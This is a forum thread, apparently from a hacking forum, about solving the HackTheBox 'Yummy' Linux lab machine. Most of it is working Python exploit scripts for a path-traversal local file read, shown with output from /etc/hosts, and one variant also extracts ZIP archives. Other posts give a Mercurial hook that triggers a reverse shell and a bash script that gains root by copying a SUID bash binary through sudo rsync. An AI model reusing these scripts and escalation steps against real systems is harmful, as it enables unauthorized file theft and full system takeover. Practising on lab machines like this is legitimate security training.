10-07-2024, 08:27 AM
Can anyone give me a hit on where to look for dev?
|
HTB Yummy Linux
by Computerlab - Saturday October 5, 2024 at 04:27 PM
|
|
10-07-2024, 08:27 AM
Can anyone give me a hit on where to look for dev?
10-07-2024, 01:04 PM
i am try to develop a script for the LFI but it always end with 404 not found... can someone help me?
import signal, time, pdb, sys, requests import random from bs4 import BeautifulSoup import re def def_handler(sig, frame): print("\n\n [!] Saliendo...\n") sys.exit(1) # Ctrl+C signal.signal(signal.SIGINT, def_handler) # global url_register = "http://yummy.htb/register" url_login = "http://yummy.htb/login" url_book = "http://yummy.htb/book" url_dashboard = "http://yummy.htb/dashboard" if __name__ == '__main__': # register new mail random_int = random.randint(0, 100000) random_mail = "user"+str(random_int) + "@yummy.htb" post_data_autenticar = { 'email':random_mail, 'password':'password' } r = requests.post(url_register, json=post_data_autenticar) if "User registered successfully" in r.text: print("\n[+] Usuario %s registrado con éxito!" % random_mail) else: if "Email already exists" in r.text: print("\n[-] El usuario ya existe!") sys.exit(1) else: print("\n[-] No se ha podido registrar el usuario!") sys.exit(1) # login with new mail s = requests.session() r = s.post(url_login, json=post_data_autenticar) if "Invalid email or password" in r.text: print("\n[-] No se ha podido iniciar sesión con el usuario creado!") sys.exit(1) else: print("\n[+] Iniciada sesión con el suario %s con éxito!" % random_mail) # book data_book = { "name": "Test", "email": random_mail, "phone": "1234567890", "date": "2024-10-07", "time": "04:18", "people": "5", "message": "Test" } r = s.post(url_book, data=data_book) if "Your booking request was sent" in r.text: print("\n[+] Se ha creado la cita con éxito!") r = s.get(url_dashboard) # Search for book ID soup = BeautifulSoup(r.text, 'html.parser') reminder_links = soup.find_all('a', href=re.compile(r'^/reminder/\d+'), class_='book-a-table-btn', role='button') for link in reminder_links: href = link.get('href') match = re.search(r'/reminder/(\d+)', href) if match: book_id = match.group(1) print("\n[+] Se extrae el ID %s de la cita en el calendario con éxito!" % book_id) else: print("\n[-] No se ha podido extraer el ID de la cita!") # New request to get LFI /export/ url_id = "http://yummy.htb/reminder/"+str(book_id) url_malicius = "http://yummy.htb/export/../../../../../../etc/hosts" r = s.get(url_id, allow_redirects=False) print(r.text) headers = r.request.headers cookie = r.request.headers.get('Cookie') new_headers = { "Hosts":"yummy.htb", "Upgrade-Insecure-Requests":"1", "User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Referer": url_id, "Accept-Encoding": "gzip, deflate, br", "Accept-Language": "en-US,en;q=0.9", "Cookie": cookie, "Connection": "keep-alive" } r = s.get(url_malicius, headers=new_headers) print(r.text)
10-08-2024, 02:25 AM
you can get away with using a simple regex you dont need beautifulsoup. as far as the 404 , its because youre not using the log in session cookie , and the x-auth-token cookie where they are required so your srcipt will fail, you could have your code reg an account and login automatically, or you can manually paste a working cookie in your code if its just a on-off. just use burp and look at the request and responses and mimic it
(10-07-2024, 01:04 PM)fvega155 Wrote: i am try to develop a script for the LFI but it always end with 404 not found... can someone help me?
10-08-2024, 10:06 AM
Thanks man, the problem was also that requests turn the URL from ../../../../../../etc/hosts to /etc/hosts, son no LFI. I have fixed it and it works!
python3 exploit.py -f /etc/hosts [+] Usuario user84684@yummy.htb registrado con éxito! [+] Iniciada sesión con el suario user84684@yummy.htb con éxito! [+] Se ha creado la cita con éxito! [+] Generada URL: http://yummy.htb/reminder/22! [+] Accediendo al fichero /etc/hosts de la máquina Yummy: 127.0.0.1 localhost yummy yummy.htb 127.0.1.1 yummy # The following lines are desirable for IPv6 capable hosts ::1 ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters If it helps the programm is: import signal, time, pdb, sys, requests import random import re import http.client import argparse def def_handler(sig, frame): print("\n\n [!] Saliendo...\n") sys.exit(1) # Ctrl+C signal.signal(signal.SIGINT, def_handler) # global url_register = "http://yummy.htb/register" url_login = "http://yummy.htb/login" url_book = "http://yummy.htb/book" url_dashboard = "http://yummy.htb/dashboard" if __name__ == '__main__': parser = argparse.ArgumentParser(description='HTB LFI Machine Yummy') parser.add_argument("-f", "--file", type=str, required=True, help="Ruta absoluta del fichero que se quiere leer con el LFI. Ej: /etc/hosts") args = parser.parse_args() lfi_file = args.file # register new mail random_int = random.randint(0, 100000) random_mail = "user"+str(random_int) + "@yummy.htb" post_data_autenticar = { 'email':random_mail, 'password':'password' } r = requests.post(url_register, json=post_data_autenticar) if "User registered successfully" in r.text: print("\n[+] Usuario %s registrado con éxito!" % random_mail) else: if "Email already exists" in r.text: print("\n[-] El usuario ya existe!") sys.exit(1) else: print("\n[-] No se ha podido registrar el usuario!") sys.exit(1) # login with new mail s = requests.session() r = s.post(url_login, json=post_data_autenticar) if "Invalid email or password" in r.text: print("\n[-] No se ha podido iniciar sesión con el usuario creado!") sys.exit(1) else: print("\n[+] Iniciada sesión con el suario %s con éxito!" % random_mail) # book data_book = { "name": "Test", "email": random_mail, "phone": "1234567890", "date": "2024-10-07", "time": "04:18", "people": "5", "message": "Test" } r = s.post(url_book, data=data_book) if "Your booking request was sent" in r.text: print("\n[+] Se ha creado la cita con éxito!") # Go to dashboard to get Book ID r = s.get(url_dashboard) content_dashboard = r.text pattern = r'/reminder/(\d+)' book_id = re.findall(pattern,content_dashboard)[0] url_id = "http://yummy.htb/reminder/"+str(book_id) print("\n[+] Generada URL: %s!" % url_id) # New request to get LFI /export/ r = s.get(url_id, allow_redirects=False) content_server = r.text pattern = r'/export/([^"]+)' calendar_file = re.findall(pattern,content_server)[0] original_cookie = r.request.headers.get('Cookie') new_headers = { "Hosts":"yummy.htb", "Upgrade-Insecure-Requests":"1", "User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Referer": url_id, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Cookie": original_cookie, "Connection": "keep-alive" } print("\n[+] Accediendo al fichero " + lfi_file + " de la máquina Yummy:\n") host = "yummy.htb" url_malicious = "/export/" + "../../../../../../" + lfi_file conn = http.client.HTTPConnection(host) conn.request("GET", url_malicious, headers=new_headers) response = conn.getresponse() data = response.read() print(data.decode())
Thank you so much @Pepperwhite
Anyone have tips for root? Im trying but the sessions is cleaning too fast
10-09-2024, 12:00 PM
Hmm..
My hg pull does not trigger the reverse shel I dropped in /tmp, and I can do a pull once? Here's what I did: copied a rev.sh to /tmp and chmod 777 it tested the shell and it connects back. I then created a .hg directory in /tmp, chmod 777 it copied ~/.hgrc to /tmp/.hg/.hgrc added: ``` [hooks] post-pull = /tmp/rev/sh ``` and sudo -u dev hg pull /usr/bin/hg pull /home/dev/app-production/ But the rev.sh is not called And when I try to to the pull again, it does not see any changes so nothing happens
10-11-2024, 08:17 AM
01-01-2025, 05:47 AM
(10-08-2024, 10:06 AM)fvega155 Wrote: Thanks man, the problem was also that requests turn the URL from ../../../../../../etc/hosts to /etc/hosts, son no LFI. I have fixed it and it works! I made a small enhancement to your script (kudos, btw). In addition to reading the contents of an arbitrary file (provided sufficient privileges), it will also read ZIP files to fix the UnicodeDecodeError. Feel free to test it. import signal, time, pdb, sys, requests
import random
import re
import http.client
import argparse
import zipfile
import io
def def_handler(sig, frame):
print("\n\n [!] Exiting...\n")
sys.exit(1)
# Ctrl+C
signal.signal(signal.SIGINT, def_handler)
# global
url_register = "http://yummy.htb/register"
url_login = "http://yummy.htb/login"
url_book = "http://yummy.htb/book"
url_dashboard = "http://yummy.htb/dashboard"
def read_zip_content(zip_data):
"""Reads and extracts content from a ZIP file."""
with zipfile.ZipFile(io.BytesIO(zip_data), 'r') as zip_ref:
#with zipfile.ZipFile(zip_data, 'r') as zip_ref:
zip_ref.printdir() # Print contents of ZIP file
# Assuming we're extracting the first file in the ZIP
for file_name in zip_ref.namelist():
with zip_ref.open(file_name) as file:
try:
# Try decoding as UTF-8
content = file.read().decode('utf-8')
print(content)
except UnicodeDecodeError:
# If decoding fails, try another encoding like 'latin-1'
print(f"Error decoding {file_name} with UTF-8. Trying 'latin-1' encoding...")
content = file.read().decode('latin-1')
print(content)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='HTB LFI Machine Yummy')
parser.add_argument("-f", "--file", type=str, required=True, help="Absolute path of the file to read with LFI. Example: /etc/hosts")
args = parser.parse_args()
lfi_file = args.file
# register new mail
random_int = random.randint(0, 100000)
random_mail = "user" + str(random_int) + "@yummy.htb"
post_data_autenticar = {
'email': random_mail,
'password': 'password'
}
r = requests.post(url_register, json=post_data_autenticar)
if "User registered successfully" in r.text:
print("\n[+] User %s registered successfully!" % random_mail)
else:
if "Email already exists" in r.text:
print("\n[-] The user already exists!")
sys.exit(1)
else:
print("\n[-] Could not register the user!")
sys.exit(1)
# login with new mail
s = requests.session()
r = s.post(url_login, json=post_data_autenticar)
if "Invalid email or password" in r.text:
print("\n[-] Could not log in with the created user!")
sys.exit(1)
else:
print("\n[+] Logged in with the user %s successfully!" % random_mail)
# book
data_book = {
"name": "Test",
"email": random_mail,
"phone": "1234567890",
"date": "2024-10-07",
"time": "04:18",
"people": "5",
"message": "Test"
}
r = s.post(url_book, data=data_book)
if "Your booking request was sent" in r.text:
print("\n[+] The appointment was created successfully!")
# Go to dashboard to get Book ID
r = s.get(url_dashboard)
content_dashboard = r.text
pattern = r'/reminder/(\d+)'
book_id = re.findall(pattern, content_dashboard)[0]
url_id = "http://yummy.htb/reminder/" + str(book_id)
print("\n[+] Generated URL: %s!" % url_id)
# New request to get LFI /export/
r = s.get(url_id, allow_redirects=False)
content_server = r.text
pattern = r'/export/([^"]+)'
calendar_file = re.findall(pattern, content_server)[0]
original_cookie = r.request.headers.get('Cookie')
new_headers = {
"Hosts": "yummy.htb",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"Referer": url_id,
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Cookie": original_cookie,
"Connection": "keep-alive"
}
print("\n[+] Accessing the file " + lfi_file + " from the Yummy machine:\n")
host = "yummy.htb"
url_malicious = "/export/" + "../../../../../../" + lfi_file
conn = http.client.HTTPConnection(host)
conn.request("GET", url_malicious, headers=new_headers)
response = conn.getresponse()
data = response.read()
# Check if the response is a ZIP file
if data[:2] == b'PK': # ZIP files typically start with 'PK'
print("\n[+] The file is a ZIP archive. Attempting to extract contents...")
# If it's a ZIP, pass it to the function to extract its contents
read_zip_content(data)
else:
# If it's not a ZIP file, proceed with normal handling
print(data.decode())
01-04-2025, 03:26 AM
(10-09-2024, 12:00 PM)a44857437 Wrote: Hmm.. Here is your error. Change this copied ~/.hgrc to /tmp/.hg/.hgrccopied ~/.hgrc to /tmp/.hg/hgrc
Ban reason: Leeching. (Permanent)
01-06-2025, 05:42 AM
The final home stretch for root was producing some weird side effects deleting the copied /bin/bash file. Scripting this worked for me.
#!/bin/bash
# Step 1: Copy the bash binary to the current directory
echo "Copying /bin/bash to the current directory..."
cp /bin/bash .
# Step 2: Set the SUID bit on the copied bash binary
echo "Setting the SUID bit on the copied bash binary..."
chmod u+s bash
# Step 3: Sync files using rsync, excluding .hg files and ensuring root ownership
echo "Syncing files from /home/dev/app-production/ to /opt/app/..."
sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/
# Step 4: Execute the copied bash binary with the -p flag to preserve the environment
echo "Running the copied bash binary with the -p flag..."
/opt/app/bash -p
echo "Script completed."Pre-req: dev access. |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 360 | 90,954 |
03-28-2026, 09:28 AM Last Post: |
||
| [FREE] HTB-ProLabs APTLABS Just Flags | 23 | 4,421 |
03-28-2026, 03:30 AM Last Post: |
||
| [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot | 87 | 9,584 |
03-27-2026, 07:22 PM Last Post: |
||
| HTB Eloquia User and Root Flags - Insane Box | 13 | 2,407 |
03-27-2026, 06:14 PM Last Post: |
||
| HTB - ALL Challenges you Stuck in | 2 | 2,705 |
03-27-2026, 04:24 PM Last Post: |
||